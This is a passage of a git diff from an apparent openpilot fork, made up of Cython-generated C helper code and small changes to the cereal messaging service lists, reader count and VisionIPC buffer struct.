if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/cereal/messaging/messaging_pyx.pyx b/cereal/messaging/messaging_pyx.pyx index 3e0768504..8216aeea9 100644 --- a/cereal/messaging/messaging_pyx.pyx +++ b/cereal/messaging/messaging_pyx.pyx @@ -20,8 +20,8 @@ from .messaging cimport Event as cppEvent, SocketEventHandle as cppSocketEventHa class MessagingError(Exception): def __init__(self, endpoint=None): - suffix = "with {endpoint}" if endpoint else "" - message = f"Messaging failure {suffix}: {strerror(errno.errno)}" + suffix = f"with {endpoint.decode('utf-8')}" if endpoint else "" + message = f"Messaging failure {suffix}: {strerror(errno.errno).decode('utf-8')}" super().__init__(message) diff --git a/cereal/messaging/messaging_pyx.so b/cereal/messaging/messaging_pyx.so index 8faf823f0..04529f8b7 100755 Binary files a/cereal/messaging/messaging_pyx.so and b/cereal/messaging/messaging_pyx.so differ diff --git a/cereal/messaging/msgq.h b/cereal/messaging/msgq.h index 170578351..0a72a3864 100644 --- a/cereal/messaging/msgq.h +++ b/cereal/messaging/msgq.h @@ -6,7 +6,7 @@ #include #define DEFAULT_SEGMENT_SIZE (10 * 1024 * 1024) -#define NUM_READERS 18 //default comma is 12 +#define NUM_READERS 12 #define ALIGN(n) ((n + (8 - 1)) & -8) #define UNUSED(x) (void)x diff --git a/cereal/services.h b/cereal/services.h index 2ed8cbc82..986611d91 100644 --- a/cereal/services.h +++ b/cereal/services.h @@ -74,8 +74,9 @@ static struct service services[] = { { "livestreamWideRoadEncodeData", 8070, false, 20, -1 }, { "livestreamRoadEncodeData", 8071, false, 20, -1 }, { "livestreamDriverEncodeData", 8072, false, 20, -1 }, - { "dragonConf", 8073, false, 1, -1 }, - { "liveMapData", 8074, true, 0, -1 }, + { "liveMapData", 8073, false, 0, -1 }, + { "longitudinalPlanExt", 8074, true, 20, 5 }, + { "lateralPlanExt", 8075, true, 20, 5 }, }; #endif diff --git a/cereal/services.py b/cereal/services.py index 06f361803..6e9f4dca1 100755 --- a/cereal/services.py +++ b/cereal/services.py @@ -95,9 +95,10 @@ services = { "livestreamRoadEncodeData": (False, 20.), "livestreamDriverEncodeData": (False, 20.), - # dp - "dragonConf": (False, 1.), - "liveMapData": (True, 0.), + # mapd + "liveMapData": (False, 0.), + "longitudinalPlanExt": (True, 20., 5), + "lateralPlanExt": (True, 20., 5), } service_list = {name: Service(new_port(idx), *vals) for # type: ignore idx, (name, vals) in enumerate(services.items())} diff --git a/cereal/visionipc/visionipc.h b/cereal/visionipc/visionipc.h index fb640692c..7489bc958 100644 --- a/cereal/visionipc/visionipc.h +++ b/cereal/visionipc/visionipc.h @@ -9,6 +9,7 @@ struct VisionIpcBufExtra { uint32_t frame_id; uint64_t timestamp_sof; uint64_t timestamp_eof; + bool valid; }; struct VisionIpcPacket { diff --git a/cereal/visionipc/visionipc.pxd b/cereal/visionipc/visionipc.pxd index 78dfbcb68..32baa9cc1 100644 --- a/cereal/visionipc/visionipc.pxd +++ b/cereal/visionipc/visionipc.pxd @@ -8,6 +8,9 @@ from libc.stdint cimport uint32_t, uint64_t from libcpp cimport bool, int cdef extern from "cereal/visionipc/visionbuf.h": + struct _cl_mem + ctypedef _cl_mem * cl_mem + cdef enum VisionStreamType: pass @@ -19,6 +22,7 @@ cdef extern from "cereal/visionipc/visionbuf.h": size_t height size_t stride size_t uv_offset + cl_mem buf_cl void set_frame_id(uint64_t id) cdef extern from "cereal/visionipc/visionipc.h": @@ -26,6 +30,7 @@ cdef extern from "cereal/visionipc/visionipc.h": uint32_t frame_id uint64_t timestamp_sof uint64_t timestamp_eof + bool valid cdef extern from "cereal/visionipc/visionipc_server.h": string get_endpoint_name(string, VisionStreamType) diff --git a/cereal/visionipc/visionipc_pyx.cpp b/cereal/visionipc/visionipc_pyx.cpp new file mode 100644 index 000000000..7d280f0f9 --- /dev/null +++ b/cereal/visionipc/visionipc_pyx.cpp @@ -0,0 +1,40152 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [ + "cereal/visionipc/visionbuf.h", + "cereal/visionipc/visionipc.h", + "cereal/visionipc/visionipc_client.h", + "cereal/visionipc/visionipc_server.h" + ], + "language": "c++", + "name": "cereal.visionipc.visionipc_pyx", + "sources": [ + "/data/openpilot/cereal/visionipc/visionipc_pyx.pyx" + ] + }, + "module_name": "cereal.visionipc.visionipc_pyx" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + 